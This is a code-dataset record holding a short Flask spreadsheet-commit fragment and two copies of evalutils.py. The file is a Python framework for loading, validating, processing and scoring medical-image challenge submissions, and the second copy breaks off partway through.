fods_path = convert_ods_to_fods(ods_path)
os.remove(ods_path)
if git('ls-files', '-m'):
git.add(fods_path)
git.commit('-m', 'Update spreadsheet.')
git.push()
return 'Consider it done!'
init()
if __name__ == '__main__':
app.run(debug=True)
| true | true |
f7fa40ab65005e934dab750f97e8216b91b792b1 | 23,200 | py | Python | evalutils/evalutils.py | GabyRumc/evalutils | d77c80d6420980a886302237ca321d09478a3db2 | [
"MIT"
] | 17 | 2018-10-31T18:46:21.000Z | 2022-01-27T05:07:56.000Z | evalutils/evalutils.py | GabyRumc/evalutils | d77c80d6420980a886302237ca321d09478a3db2 | [
"MIT"
] | 117 | 2018-03-29T08:39:22.000Z | 2022-03-30T07:47:15.000Z | evalutils/evalutils.py | GabyRumc/evalutils | d77c80d6420980a886302237ca321d09478a3db2 | [
"MIT"
] | 8 | 2018-07-23T13:40:15.000Z | 2022-03-31T13:28:52.000Z | import json
import logging
from abc import ABC, abstractmethod
from os import PathLike
from pathlib import Path
from typing import (
Any,
Callable,
Dict,
Iterable,
List,
Optional,
Pattern,
Set,
Tuple,
Union,
)
from warnings import warn
import SimpleITK
from pandas import DataFrame, Series, concat, merge
from .exceptions import ConfigurationError, FileLoaderError, ValidationError
from .io import (
CSVLoader,
FileLoader,
ImageLoader,
SimpleITKLoader,
first_int_in_filename_key,
)
from .scorers import score_detection
from .validators import DataFrameValidator, UniqueImagesValidator
logger = logging.getLogger(__name__)
# Default container I/O locations; every one of them can be overridden via
# the corresponding constructor argument of Algorithm / BaseEvaluation below.
DEFAULT_INPUT_PATH = Path("/input/")
DEFAULT_ALGORITHM_OUTPUT_IMAGES_PATH = Path("/output/images/")
DEFAULT_ALGORITHM_OUTPUT_FILE_PATH = Path("/output/results.json")
DEFAULT_GROUND_TRUTH_PATH = Path("/opt/evaluation/ground-truth/")
DEFAULT_EVALUATION_OUTPUT_FILE_PATH = Path("/output/metrics.json")
class Algorithm(ABC):
    def __init__(
        self,
        *,
        index_key: str = "input_image",
        file_loaders: Optional[Dict[str, FileLoader]] = None,
        file_filters: Optional[Dict[str, Optional[Pattern[str]]]] = None,
        input_path: Path = DEFAULT_INPUT_PATH,
        output_path: Path = DEFAULT_ALGORITHM_OUTPUT_IMAGES_PATH,
        file_sorter_key: Optional[Callable] = None,
        validators: Optional[Dict[str, Tuple[DataFrameValidator, ...]]] = None,
        output_file: PathLike = DEFAULT_ALGORITHM_OUTPUT_FILE_PATH,
    ):
        """
        The base class for all algorithms. Sets the environment and controls
        the flow of the processing once `process` is called.
        Parameters
        ----------
        index_key
            Fileloader key which must be used for the index.
            Default: `input_image`
        file_loaders
            The loaders that will be used to get all files.
            Default: `evalutils.io.SimpleITKLoader` for `input_image`
        file_filters
            Regular expressions for filtering certain FileLoaders.
            Default: no filtering.
        input_path
            The path in the container where the ground truth will be loaded
            from. Default: `/input`
        output_path
            The path in the container where the output images will be written.
            Default: `/output/images`
        file_sorter_key
            A function that determines how files in the input_path are sorted.
            Default: `None` (alphanumerical)
        validators
            A dictionary containing the validators that will be used on the
            loaded data per file_loader key. Default:
            `evalutils.validators.UniqueImagesValidator` for `input_image`
        output_file
            The path to the location where the results will be written.
            Default: `/output/results.json`
        """
        self._index_key = index_key
        self._input_path = input_path
        self._output_path = output_path
        self._file_sorter_key = file_sorter_key
        self._output_file = output_file
        self._ground_truth_cases = DataFrame()
        self._predictions_cases = DataFrame()
        # Loaded cases per file-loader key (filled by load()).
        self._cases: Dict[str, DataFrame] = {}
        # One result dict per processed case (filled by process_cases()).
        self._case_results: List[Dict] = []
        self._validators: Dict[str, Tuple[DataFrameValidator, ...]] = (
            dict(input_image=(UniqueImagesValidator(),))
            if validators is None
            else validators
        )
        self._file_loaders: Dict[str, FileLoader] = (
            dict(input_image=SimpleITKLoader())
            if file_loaders is None
            else file_loaders
        )
        self._file_filters: Dict[str, Optional[Pattern[str]]] = (
            dict(input_image=None) if file_filters is None else file_filters
        )
        super().__init__()
    def load(self):
        """Load the cases for every registered file loader into self._cases."""
        for key, file_loader in self._file_loaders.items():
            # A loader without a registered filter loads all files.
            fltr = (
                self._file_filters[key] if key in self._file_filters else None
            )
            self._cases[key] = self._load_cases(
                folder=self._input_path,
                file_loader=file_loader,
                file_filter=fltr,
            )
    def _load_cases(
        self,
        *,
        folder: Path,
        file_loader: ImageLoader,
        file_filter: Optional[Pattern[str]] = None,
    ) -> DataFrame:
        """Load all files under *folder* that match *file_filter* using
        *file_loader*; raises FileLoaderError when nothing could be loaded."""
        cases = None
        for f in sorted(folder.glob("**/*"), key=self._file_sorter_key):
            if file_filter is None or file_filter.match(str(f)):
                try:
                    new_cases = file_loader.load(fname=f)
                except FileLoaderError:
                    # Unloadable files are skipped with a warning, not fatal.
                    logger.warning(
                        f"Could not load {f.name} using {file_loader}."
                    )
                else:
                    if cases is None:
                        cases = new_cases
                    else:
                        cases += new_cases
            else:
                logger.info(
                    f"Skip loading {f.name} because it doesn't match {file_filter}."
                )
        if cases is None:
            raise FileLoaderError(
                f"Could not load any files in {folder} with " f"{file_loader}."
            )
        return DataFrame(cases)
    def validate(self):
        """ Validates each dataframe for each fileloader separately """
        file_loaders_keys = [k for k in self._file_loaders.keys()]
        # Every validator key must refer to a configured file loader.
        for key in self._validators.keys():
            if key not in file_loaders_keys:
                raise ValueError(
                    f"There is no file_loader associated with: {key}.\n"
                    f"Valid file loaders are: {file_loaders_keys}"
                )
        for key, cases in self._cases.items():
            if key in self._validators:
                self._validate_data_frame(df=cases, file_loader_key=key)
    def _validate_data_frame(self, *, df: DataFrame, file_loader_key: str):
        # Run every validator registered for this loader key against df.
        for validator in self._validators[file_loader_key]:
            validator.validate(df=df)
    def process(self):
        """Run the full pipeline: load, validate, process all cases, save."""
        self.load()
        self.validate()
        self.process_cases()
        self.save()
    def process_cases(self, file_loader_key: Optional[str] = None):
        """Process every case loaded under *file_loader_key* (defaults to
        the configured index key), collecting one result dict per case."""
        if file_loader_key is None:
            file_loader_key = self._index_key
        self._case_results = []
        for idx, case in self._cases[file_loader_key].iterrows():
            self._case_results.append(self.process_case(idx=idx, case=case))
    @abstractmethod
    def process_case(self, *, idx: int, case: DataFrame) -> Dict:
        """Process a single case row; subclasses return its result dict."""
        raise NotImplementedError()
    def save(self):
        """Write the accumulated case results to the JSON output file."""
        with open(str(self._output_file), "w") as f:
            json.dump(self._case_results, f)
    def _load_input_image(self, *, case) -> Tuple[SimpleITK.Image, Path]:
        """Load the input image for *case* and verify it against the stored
        hash; returns the image together with its file path."""
        input_image_file_path = case["path"]
        input_image_file_loader = self._file_loaders["input_image"]
        if not isinstance(input_image_file_loader, ImageLoader):
            raise RuntimeError(
                "The used FileLoader was not of subclass ImageLoader"
            )
        # Load the image for this case
        input_image = input_image_file_loader.load_image(input_image_file_path)
        # Check that it is the expected image
        if input_image_file_loader.hash_image(input_image) != case["hash"]:
            raise RuntimeError("Image hashes do not match")
        return input_image, input_image_file_path
    @abstractmethod
    def predict(self, *, input_image: SimpleITK.Image) -> Any:
        """Subclasses implement the actual inference on one image."""
        raise NotImplementedError()
class DetectionAlgorithm(Algorithm):
    """Algorithm base class whose predict() returns a DataFrame of scored
    candidate detections, serialized into the results JSON per case."""
    def process_case(self, *, idx, case):
        # Load and test the image for this case
        input_image, input_image_file_path = self._load_input_image(case=case)
        # Detect and score candidates
        scored_candidates = self.predict(input_image=input_image)
        # Write resulting candidates to result.json for this case
        return {
            "outputs": [
                dict(type="candidates", data=scored_candidates.to_dict())
            ],
            "inputs": [
                dict(type="metaio_image", filename=input_image_file_path.name)
            ],
            "error_messages": [],
        }
    @abstractmethod
    def predict(self, *, input_image: SimpleITK.Image) -> DataFrame:
        """Return a DataFrame of scored candidates for *input_image*."""
        raise NotImplementedError()
    @staticmethod
    def _serialize_candidates(
        *,
        candidates: Iterable[Tuple[float, ...]],
        candidate_scores: List[Any],
        ref_image: SimpleITK.Image,
    ) -> List[Dict]:
        """Convert index-space candidate coordinates to world coordinates of
        *ref_image* and pair each with its score.

        Candidates are given in (z, y, x)-style index order and reversed
        before the SimpleITK index->physical transform; output keys are
        coordX/coordY/coordZ plus 'score'.
        """
        data = []
        for coord, score in zip(candidates, candidate_scores):
            world_coords = ref_image.TransformContinuousIndexToPhysicalPoint(
                [c for c in reversed(coord)]
            )
            coord_data = {
                f"coord{k}": v for k, v in zip(["X", "Y", "Z"], world_coords)
            }
            coord_data.update({"score": score})
            data.append(coord_data)
        return data
class SegmentationAlgorithm(Algorithm):
    """Algorithm base class whose predict() returns a segmentation image,
    written next to the results under the output images path."""
    def process_case(self, *, idx, case):
        # Load and test the image for this case
        input_image, input_image_file_path = self._load_input_image(case=case)
        # Segment nodule candidates
        segmented_nodules = self.predict(input_image=input_image)
        # Write resulting segmentation to output location, reusing the input
        # file name so outputs can be matched to inputs.
        segmentation_path = self._output_path / input_image_file_path.name
        if not self._output_path.exists():
            self._output_path.mkdir()
        SimpleITK.WriteImage(segmented_nodules, str(segmentation_path), True)
        # Write segmentation file path to result.json for this case
        return {
            "outputs": [
                dict(type="metaio_image", filename=segmentation_path.name)
            ],
            "inputs": [
                dict(type="metaio_image", filename=input_image_file_path.name)
            ],
            "error_messages": [],
        }
    @abstractmethod
    def predict(self, *, input_image: SimpleITK.Image) -> SimpleITK.Image:
        """Return the segmentation image for *input_image*."""
        raise NotImplementedError()
class ClassificationAlgorithm(Algorithm):
    """Algorithm base class whose predict() returns a dict of classification
    outputs, embedded directly into the results JSON per case."""
    def process_case(self, *, idx, case):
        """Load the case image, run predict(), and build the result entry.

        Raises ValueError when predict() does not return a dict.
        """
        # Load and test the image for this case
        input_image, input_image_file_path = self._load_input_image(case=case)
        # Classify input_image image
        results = self.predict(input_image=input_image)
        # Test classification output (fixed typo: "Exepected" -> "Expected")
        if not isinstance(results, dict):
            raise ValueError("Expected a dictionary as output")
        # Write resulting classification to result.json for this case
        return {
            "outputs": [results],
            "inputs": [
                dict(type="metaio_image", filename=input_image_file_path.name)
            ],
            "error_messages": [],
        }
    @abstractmethod
    def predict(self, *, input_image: SimpleITK.Image) -> Dict:
        """Return a dict of classification results for *input_image*."""
        raise NotImplementedError()
class BaseEvaluation(ABC):
    def __init__(
        self,
        *,
        ground_truth_path: Path = DEFAULT_GROUND_TRUTH_PATH,
        predictions_path: Path = DEFAULT_INPUT_PATH,
        file_sorter_key: Callable = first_int_in_filename_key,
        file_loader: FileLoader,
        validators: Tuple[DataFrameValidator, ...],
        join_key: Optional[str] = None,
        aggregates: Optional[Set[str]] = None,
        output_file: PathLike = DEFAULT_EVALUATION_OUTPUT_FILE_PATH,
    ):
        """
        The base class for all evaluations. Sets the environment and controls
        the flow of the evaluation once `evaluate` is called.
        Parameters
        ----------
        ground_truth_path
            The path in the container where the ground truth will be loaded
            from
        predictions_path
            The path in the container where the submission will be loaded from
        file_sorter_key
            A function that determines how files are sorted and matched
            together
        file_loader
            The loader that will be used to get all files
        validators
            A tuple containing all the validators that will be used on the
            loaded data
        join_key
            The column that will be used to join the predictions and ground
            truth tables
        aggregates
            The set of aggregates that will be calculated by
            `pandas.DataFrame.describe`
        output_file
            The path to the location where the results will be written
        """
        if aggregates is None:
            # Default to every statistic that DataFrame.describe can emit.
            aggregates = {
                "mean",
                "std",
                "min",
                "max",
                "25%",
                "50%",
                "75%",
                "count",
                "uniq",
                "freq",
            }
        self._ground_truth_path = ground_truth_path
        self._predictions_path = predictions_path
        self._file_sorter_key = file_sorter_key
        self._file_loader = file_loader
        self._validators = validators
        self._join_key = join_key
        self._aggregates = aggregates
        self._output_file = output_file
        self._ground_truth_cases = DataFrame()
        self._predictions_cases = DataFrame()
        self._cases = DataFrame()
        self._case_results = DataFrame()
        self._aggregate_results: Dict[str, Union[float, int, str, None]] = {}
        super().__init__()
        # CSV ground truth / predictions can only be matched via a join key.
        if isinstance(self._file_loader, CSVLoader) and self._join_key is None:
            raise ConfigurationError(
                f"You must set a `join_key` when using {self._file_loader}."
            )
    @property
    def _metrics(self) -> Dict:
        """ Returns the calculated case and aggregate results """
        # 'case' holds the per-case score table; 'aggregates' the summary
        # statistics computed over it.
        return {
            "case": self._case_results.to_dict(),
            "aggregates": self._aggregate_results,
        }
def evaluate(self):
self.load()
self.validate()
self.merge_ground_truth_and_predictions()
self.cross_validate()
self.score()
self.save()
def load(self):
self._ground_truth_cases = self._load_cases(
folder=self._ground_truth_path
)
self._predictions_cases = self._load_cases(
folder=self._predictions_path
)
def _load_cases(self, *, folder: Path) -> DataFrame:
cases = None
for f in sorted(folder.glob("**/*"), key=self._file_sorter_key):
try:
new_cases = self._file_loader.load(fname=f)
except FileLoaderError:
logger.warning(
f"Could not load {f.name} using {self._file_loader}."
)
else:
if cases is None:
cases = new_cases
else:
cases += new_cases
if cases is None:
raise FileLoaderError(
f"Could not load any files in {folder} with "
f"{self._file_loader}."
)
return DataFrame(cases)
def validate(self):
""" Validates each dataframe separately """
self._validate_data_frame(df=self._ground_truth_cases)
self._validate_data_frame(df=self._predictions_cases)
def _validate_data_frame(self, *, df: DataFrame):
for validator in self._validators:
validator.validate(df=df)
@abstractmethod
def merge_ground_truth_and_predictions(self):
pass
@abstractmethod
def cross_validate(self):
""" Validates both dataframes """
pass
def _raise_missing_predictions_error(self, *, missing=None):
if missing is not None:
message = (
"Predictions missing: you did not submit predictions for "
f"{missing}. Please try again."
)
else:
message = (
"Predictions missing: you did not submit enough predictions, "
"please try again."
)
raise ValidationError(message)
def _raise_extra_predictions_error(self, *, extra=None):
if extra is not None:
message = (
"Too many predictions: we do not have the ground truth data "
f"for {extra}. Please try again."
)
else:
message = (
"Too many predictions: you submitted too many predictions, "
"please try again."
)
raise ValidationError(message)
@abstractmethod
def score(self):
pass
# noinspection PyUnusedLocal
def score_case(self, *, idx: int, case: DataFrame) -> Dict:
return {}
def score_aggregates(self) -> Dict:
aggregate_results = {}
for col in self._case_results.columns:
aggregate_results[col] = self.aggregate_series(
series=self._case_results[col]
)
return aggregate_results
def aggregate_series(self, *, series: Series) -> Dict:
summary = series.describe()
valid_keys = [a for a in self._aggregates if a in summary]
series_summary = {}
for k in valid_keys:
value = summary[k]
# % in keys could cause problems when looking up values later
key = k.replace("%", "pc")
try:
json.dumps(value)
except TypeError:
logger.warning(
f"Could not serialize {key}: {value} as json, "
f"so converting {value} to int."
)
value = int(value)
series_summary[key] = value
return series_summary
def save(self):
with open(self._output_file, "w") as f:
f.write(json.dumps(self._metrics))
class ClassificationEvaluation(BaseEvaluation):
    """
    ClassificationEvaluations have the same number of predictions as the
    number of ground truth cases. These can be things like, what is the
    stage of this case, or segment some things in this case.
    """
    def merge_ground_truth_and_predictions(self):
        """Outer-join ground truth and predictions, either on the join key
        or on the row index, keeping a ``_merge`` indicator column."""
        if self._join_key:
            kwargs = {"on": self._join_key}
        else:
            kwargs = {"left_index": True, "right_index": True}
        self._cases = merge(
            left=self._ground_truth_cases,
            right=self._predictions_cases,
            indicator=True,
            how="outer",
            suffixes=("_ground_truth", "_prediction"),
            **kwargs,
        )
    def cross_validate(self):
        """Raise if any ground-truth row lacks a prediction, or if there
        are predictions without matching ground truth."""
        missing = [
            p for _, p in self._cases.iterrows() if p["_merge"] == "left_only"
        ]
        if missing:
            if self._join_key:
                missing = [p[self._join_key] for p in missing]
            self._raise_missing_predictions_error(missing=missing)
        extra = [
            p for _, p in self._cases.iterrows() if p["_merge"] == "right_only"
        ]
        if extra:
            if self._join_key:
                extra = [p[self._join_key] for p in extra]
            self._raise_extra_predictions_error(extra=extra)
    def score(self):
        """Score every merged case, then compute the aggregate metrics.

        Collects one result dict per case and builds the DataFrame once:
        calling ``DataFrame.append`` inside the loop re-allocated the whole
        frame each iteration (O(n^2)) and the method was removed in
        pandas 2.0.
        """
        rows = [
            self.score_case(idx=idx, case=case)
            for idx, case in self._cases.iterrows()
        ]
        self._case_results = DataFrame(rows)
        self._aggregate_results = self.score_aggregates()
class Evaluation(ClassificationEvaluation):
    """Deprecated alias kept for backwards compatibility.

    Use :class:`ClassificationEvaluation` instead; instantiating this
    class emits a ``DeprecationWarning``.
    """
    def __init__(self, *args, **kwargs):
        message = (
            "The Evaluation class is deprecated, "
            "please use ClassificationEvaluation instead"
        )
        warn(message, DeprecationWarning)
        super().__init__(*args, **kwargs)
class DetectionEvaluation(BaseEvaluation):
    """
    DetectionEvaluations have a different number of predictions from the
    number of ground truth annotations. An example would be detecting lung
    nodules in a CT volume, or malignant cells in a pathology slide.
    """
    def __init__(self, *args, detection_radius, detection_threshold, **kwargs):
        # detection_radius: maximum ground-truth/prediction distance that
        # still counts as a hit (passed to score_detection).
        # detection_threshold: stored for subclasses; not read in this class.
        super().__init__(*args, **kwargs)
        self._detection_radius = detection_radius
        self._detection_threshold = detection_threshold
    def merge_ground_truth_and_predictions(self):
        # Detection rows cannot be joined 1:1, so the two tables are simply
        # stacked under "ground_truth"/"predictions" outer index keys.
        self._cases = concat(
            [self._ground_truth_cases, self._predictions_cases],
            keys=["ground_truth", "predictions"],
        )
    def cross_validate(self):
        """Report missing/extra case keys (warnings only, see overrides)."""
        expected_keys = set(self._ground_truth_cases[self._join_key])
        submitted_keys = set(self._predictions_cases[self._join_key])
        missing = expected_keys - submitted_keys
        if missing:
            self._raise_missing_predictions_error(missing=missing)
        extra = submitted_keys - expected_keys
        if extra:
            self._raise_extra_predictions_error(extra=extra)
    def _raise_extra_predictions_error(self, *, extra=None):
        """ In detection challenges extra predictions are ok """
        warn(f"There are extra predictions for cases: {extra}.")
    def _raise_missing_predictions_error(self, *, missing=None):
        """ In detection challenges missing predictions are ok """
        warn(f"Could not find predictions for cases: {missing}.")
    def score(self):
        """Score each distinct case key found in either table."""
        cases = set(self._ground_truth_cases[self._join_key])
        cases |= set(self._predictions_cases[self._join_key])
        self._case_results = DataFrame()
        for idx, case in enumerate(cases):
            # NOTE(review): DataFrame.append is removed in pandas >= 2.0;
            # collect rows and build the frame once when upgrading.
            self._case_results = self._case_results.append(
                self.score_case(
                    idx=idx,
                    case=self._cases.loc[self._cases[self._join_key] == case],
                ),
                ignore_index=True,
            )
        self._aggregate_results = self.score_aggregates()
    def score_case(self, *, idx, case):
        """Run hit/miss detection scoring for one case's stacked rows."""
        score = score_detection(
            ground_truth=self.get_points(case=case, key="ground_truth"),
            predictions=self.get_points(case=case, key="predictions"),
            radius=self._detection_radius,
        )
        # Add the case id to the score
        output = score._asdict()
        output.update({self._join_key: case[self._join_key][0]})
        return output
    def get_points(
        self, *, case, key: str
    ) -> List[Tuple[Union[int, float], Union[int, float]]]:
        """Extract the points for *key* from *case*; subclasses implement."""
        raise NotImplementedError
    def score_aggregates(self):
        """Add per-column sums plus precision/recall/F1 to the aggregates."""
        aggregate_results = super().score_aggregates()
        totals = self._case_results.sum()
        for s in totals.index:
            aggregate_results[s]["sum"] = totals[s]
        tp = aggregate_results["true_positives"]["sum"]
        fp = aggregate_results["false_positives"]["sum"]
        fn = aggregate_results["false_negatives"]["sum"]
        # NOTE(review): divides by zero when tp+fp or tp+fn is 0 -- confirm
        # upstream guarantees at least one annotation and one prediction.
        aggregate_results["precision"] = tp / (tp + fp)
        aggregate_results["recall"] = tp / (tp + fn)
        aggregate_results["f1_score"] = 2 * tp / ((2 * tp) + fp + fn)
        return aggregate_results
| 33.142857 | 84 | 0.597759 | import json
import logging
from abc import ABC, abstractmethod
from os import PathLike
from pathlib import Path
from typing import (
Any,
Callable,
Dict,
Iterable,
List,
Optional,
Pattern,
Set,
Tuple,
Union,
)
from warnings import warn
import SimpleITK
from pandas import DataFrame, Series, concat, merge
from .exceptions import ConfigurationError, FileLoaderError, ValidationError
from .io import (
CSVLoader,
FileLoader,
ImageLoader,
SimpleITKLoader,
first_int_in_filename_key,
)
from .scorers import score_detection
from .validators import DataFrameValidator, UniqueImagesValidator
logger = logging.getLogger(__name__)
DEFAULT_INPUT_PATH = Path("/input/")
DEFAULT_ALGORITHM_OUTPUT_IMAGES_PATH = Path("/output/images/")
DEFAULT_ALGORITHM_OUTPUT_FILE_PATH = Path("/output/results.json")
DEFAULT_GROUND_TRUTH_PATH = Path("/opt/evaluation/ground-truth/")
DEFAULT_EVALUATION_OUTPUT_FILE_PATH = Path("/output/metrics.json")
class Algorithm(ABC):
    """Base class for container algorithms.

    Loads input files per configured loader, validates the resulting
    tables, runs ``process_case`` for each row of the index table and
    writes the collected results to a JSON file.
    """
    def __init__(
        self,
        *,
        index_key: str = "input_image",
        file_loaders: Optional[Dict[str, FileLoader]] = None,
        file_filters: Optional[Dict[str, Optional[Pattern[str]]]] = None,
        input_path: Path = DEFAULT_INPUT_PATH,
        output_path: Path = DEFAULT_ALGORITHM_OUTPUT_IMAGES_PATH,
        file_sorter_key: Optional[Callable] = None,
        validators: Optional[Dict[str, Tuple[DataFrameValidator, ...]]] = None,
        output_file: PathLike = DEFAULT_ALGORITHM_OUTPUT_FILE_PATH,
    ):
        """
        Parameters
        ----------
        index_key
            Key of the file loader whose cases table drives ``process_cases``.
        file_loaders
            Mapping of key -> loader; defaults to a SimpleITK image loader
            under "input_image".
        file_filters
            Optional per-key filename regex filters.
        input_path, output_path
            Container folders for inputs and produced images.
        file_sorter_key
            Sort key used when globbing input files.
        validators
            Per-key DataFrame validators; defaults to a unique-image check.
        output_file
            Where the per-case results JSON is written.
        """
        self._index_key = index_key
        self._input_path = input_path
        self._output_path = output_path
        self._file_sorter_key = file_sorter_key
        self._output_file = output_file
        self._ground_truth_cases = DataFrame()
        self._predictions_cases = DataFrame()
        self._cases: Dict[str, DataFrame] = {}
        self._case_results: List[Dict] = []
        self._validators: Dict[str, Tuple[DataFrameValidator, ...]] = (
            dict(input_image=(UniqueImagesValidator(),))
            if validators is None
            else validators
        )
        self._file_loaders: Dict[str, FileLoader] = (
            dict(input_image=SimpleITKLoader())
            if file_loaders is None
            else file_loaders
        )
        self._file_filters: Dict[str, Optional[Pattern[str]]] = (
            dict(input_image=None) if file_filters is None else file_filters
        )
        super().__init__()
    def load(self):
        """Load a cases table for every configured file loader."""
        for key, file_loader in self._file_loaders.items():
            fltr = (
                self._file_filters[key] if key in self._file_filters else None
            )
            self._cases[key] = self._load_cases(
                folder=self._input_path,
                file_loader=file_loader,
                file_filter=fltr,
            )
    def _load_cases(
        self,
        *,
        folder: Path,
        file_loader: ImageLoader,
        file_filter: Pattern[str] = None,
    ) -> DataFrame:
        """Load all files in *folder* that match *file_filter*.

        Unreadable files are logged and skipped; raises ``FileLoaderError``
        if nothing at all could be loaded.
        """
        cases = None
        for f in sorted(folder.glob("**/*"), key=self._file_sorter_key):
            if file_filter is None or file_filter.match(str(f)):
                try:
                    new_cases = file_loader.load(fname=f)
                except FileLoaderError:
                    logger.warning(
                        f"Could not load {f.name} using {file_loader}."
                    )
                else:
                    if cases is None:
                        cases = new_cases
                    else:
                        # Loaders return list-like records; += concatenates.
                        cases += new_cases
            else:
                logger.info(
                    f"Skip loading {f.name} because it doesn't match {file_filter}."
                )
        if cases is None:
            raise FileLoaderError(
                f"Could not load any files in {folder} with " f"{file_loader}."
            )
        return DataFrame(cases)
    def validate(self):
        """Check validator keys and run the validators for each table."""
        file_loaders_keys = [k for k in self._file_loaders.keys()]
        for key in self._validators.keys():
            if key not in file_loaders_keys:
                raise ValueError(
                    f"There is no file_loader associated with: {key}.\n"
                    f"Valid file loaders are: {file_loaders_keys}"
                )
        for key, cases in self._cases.items():
            if key in self._validators:
                self._validate_data_frame(df=cases, file_loader_key=key)
    def _validate_data_frame(self, *, df: DataFrame, file_loader_key: str):
        # Validators raise on failure, so completion means the frame is valid.
        for validator in self._validators[file_loader_key]:
            validator.validate(df=df)
    def process(self):
        """Full pipeline: load -> validate -> process all cases -> save."""
        self.load()
        self.validate()
        self.process_cases()
        self.save()
    def process_cases(self, file_loader_key: str = None):
        """Run ``process_case`` for each row of the chosen cases table."""
        if file_loader_key is None:
            file_loader_key = self._index_key
        self._case_results = []
        for idx, case in self._cases[file_loader_key].iterrows():
            self._case_results.append(self.process_case(idx=idx, case=case))
    @abstractmethod
    def process_case(self, *, idx: int, case: DataFrame) -> Dict:
        raise NotImplementedError()
    def save(self):
        """Write the collected per-case results as JSON."""
        with open(str(self._output_file), "w") as f:
            json.dump(self._case_results, f)
    def _load_input_image(self, *, case) -> Tuple[SimpleITK.Image, Path]:
        """Load the case's image and verify it against the stored hash."""
        input_image_file_path = case["path"]
        input_image_file_loader = self._file_loaders["input_image"]
        if not isinstance(input_image_file_loader, ImageLoader):
            raise RuntimeError(
                "The used FileLoader was not of subclass ImageLoader"
            )
        # Load the image for this case
        input_image = input_image_file_loader.load_image(input_image_file_path)
        # Check that it is the expected image
        if input_image_file_loader.hash_image(input_image) != case["hash"]:
            raise RuntimeError("Image hashes do not match")
        return input_image, input_image_file_path
    @abstractmethod
    def predict(self, *, input_image: SimpleITK.Image) -> Any:
        raise NotImplementedError()
class DetectionAlgorithm(Algorithm):
    """Algorithm wrapper whose ``predict`` returns a frame of scored
    detection candidates, serialized into the results JSON."""
    def process_case(self, *, idx, case):
        """Run detection for one case and return its result.json entry."""
        # Load and test the image for this case
        input_image, input_image_file_path = self._load_input_image(case=case)
        # Detect and score candidates
        scored_candidates = self.predict(input_image=input_image)
        # Write resulting candidates to result.json for this case
        return {
            "outputs": [
                dict(type="candidates", data=scored_candidates.to_dict())
            ],
            "inputs": [
                dict(type="metaio_image", filename=input_image_file_path.name)
            ],
            "error_messages": [],
        }
    @abstractmethod
    def predict(self, *, input_image: SimpleITK.Image) -> DataFrame:
        """Return the scored candidates for *input_image*."""
        raise NotImplementedError()
    @staticmethod
    def _serialize_candidates(
        *,
        candidates: Iterable[Tuple[float, ...]],
        candidate_scores: List[Any],
        ref_image: SimpleITK.Image,
    ) -> List[Dict]:
        """Convert index-space candidates to world-coordinate dicts.

        Candidates are given in reversed (e.g. z, y, x) index order --
        note the ``reversed`` call before the physical-point transform.
        """
        data = []
        for coord, score in zip(candidates, candidate_scores):
            world_coords = ref_image.TransformContinuousIndexToPhysicalPoint(
                [c for c in reversed(coord)]
            )
            coord_data = {
                f"coord{k}": v for k, v in zip(["X", "Y", "Z"], world_coords)
            }
            coord_data.update({"score": score})
            data.append(coord_data)
        return data
class SegmentationAlgorithm(Algorithm):
    """Algorithm wrapper that writes one segmentation image per input."""
    def process_case(self, *, idx, case):
        """Segment one case, persist the image, return its result entry."""
        # Load and test the image for this case
        input_image, input_image_file_path = self._load_input_image(case=case)
        # Segment nodule candidates
        segmented_nodules = self.predict(input_image=input_image)
        # Write resulting segmentation to output location
        segmentation_path = self._output_path / input_image_file_path.name
        if not self._output_path.exists():
            self._output_path.mkdir()
        # Third argument enables compression (SimpleITK useCompression).
        SimpleITK.WriteImage(segmented_nodules, str(segmentation_path), True)
        # Write segmentation file path to result.json for this case
        return {
            "outputs": [
                dict(type="metaio_image", filename=segmentation_path.name)
            ],
            "inputs": [
                dict(type="metaio_image", filename=input_image_file_path.name)
            ],
            "error_messages": [],
        }
    @abstractmethod
    def predict(self, *, input_image: SimpleITK.Image) -> SimpleITK.Image:
        """Return the segmentation image for *input_image*."""
        raise NotImplementedError()
class ClassificationAlgorithm(Algorithm):
    """Algorithm wrapper whose ``predict`` returns a dict of
    classification outputs for one image."""
    def process_case(self, *, idx, case):
        """Classify one case and return its result.json entry.

        Raises
        ------
        ValueError
            If ``predict`` does not return a dictionary.
        """
        # Load and test the image for this case
        input_image, input_image_file_path = self._load_input_image(case=case)
        # Classify input_image image
        results = self.predict(input_image=input_image)
        # Test classification output (error message typo "Exepected" fixed)
        if not isinstance(results, dict):
            raise ValueError("Expected a dictionary as output")
        # Write resulting classification to result.json for this case
        return {
            "outputs": [results],
            "inputs": [
                dict(type="metaio_image", filename=input_image_file_path.name)
            ],
            "error_messages": [],
        }
    @abstractmethod
    def predict(self, *, input_image: SimpleITK.Image) -> Dict:
        """Return the classification outputs for *input_image*."""
        raise NotImplementedError()
class BaseEvaluation(ABC):
def __init__(
self,
*,
ground_truth_path: Path = DEFAULT_GROUND_TRUTH_PATH,
predictions_path: Path = DEFAULT_INPUT_PATH,
file_sorter_key: Callable = first_int_in_filename_key,
file_loader: FileLoader,
validators: Tuple[DataFrameValidator, ...],
join_key: str = None,
aggregates: Set[str] = None,
output_file: PathLike = DEFAULT_EVALUATION_OUTPUT_FILE_PATH,
):
if aggregates is None:
aggregates = {
"mean",
"std",
"min",
"max",
"25%",
"50%",
"75%",
"count",
"uniq",
"freq",
}
self._ground_truth_path = ground_truth_path
self._predictions_path = predictions_path
self._file_sorter_key = file_sorter_key
self._file_loader = file_loader
self._validators = validators
self._join_key = join_key
self._aggregates = aggregates
self._output_file = output_file
self._ground_truth_cases = DataFrame()
self._predictions_cases = DataFrame()
self._cases = DataFrame()
self._case_results = DataFrame()
self._aggregate_results: Dict[str, Union[float, int, str, None]] = {}
super().__init__()
if isinstance(self._file_loader, CSVLoader) and self._join_key is None:
raise ConfigurationError(
f"You must set a `join_key` when using {self._file_loader}."
)
@property
def _metrics(self) -> Dict:
return {
"case": self._case_results.to_dict(),
"aggregates": self._aggregate_results,
}
def evaluate(self):
self.load()
self.validate()
self.merge_ground_truth_and_predictions()
self.cross_validate()
self.score()
self.save()
def load(self):
self._ground_truth_cases = self._load_cases(
folder=self._ground_truth_path
)
self._predictions_cases = self._load_cases(
folder=self._predictions_path
)
def _load_cases(self, *, folder: Path) -> DataFrame:
cases = None
for f in sorted(folder.glob("**/*"), key=self._file_sorter_key):
try:
new_cases = self._file_loader.load(fname=f)
except FileLoaderError:
logger.warning(
f"Could not load {f.name} using {self._file_loader}."
)
else:
if cases is None:
cases = new_cases
else:
cases += new_cases
if cases is None:
raise FileLoaderError(
f"Could not load any files in {folder} with "
f"{self._file_loader}."
)
